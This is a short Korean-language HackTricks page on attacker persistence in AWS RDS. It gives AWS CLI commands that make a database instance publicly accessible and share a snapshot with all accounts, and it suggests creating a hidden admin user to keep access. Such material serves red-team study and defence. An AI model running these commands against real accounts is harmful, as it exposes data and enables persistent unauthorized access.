AWS - RDS 지속성

Reading time: 2 minutes

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기

RDS

자세한 정보는 다음을 확인하세요:

AWS - Relational Database (RDS) Enum

인스턴스를 공개적으로 접근 가능하게 만들기: rds:ModifyDBInstance

이 권한을 가진 공격자는 기존 RDS 인스턴스를 수정하여 공개적으로 접근 가능하게 만들 수 있습니다.

bash
aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

DB 내부에 admin user 생성

공격자는 단순히 create a user inside the DB 할 수 있으므로, master users password가 변경되더라도 데이터베이스 접근을 잃지 않을 수 있다.

snapshot을 공개로 설정

bash
aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

tip

AWS 해킹 배우기 및 연습하기:HackTricks Training AWS Red Team Expert (ARTE)
GCP 해킹 배우기 및 연습하기: HackTricks Training GCP Red Team Expert (GRTE) Azure 해킹 배우기 및 연습하기: HackTricks Training Azure Red Team Expert (AzRTE)

HackTricks 지원하기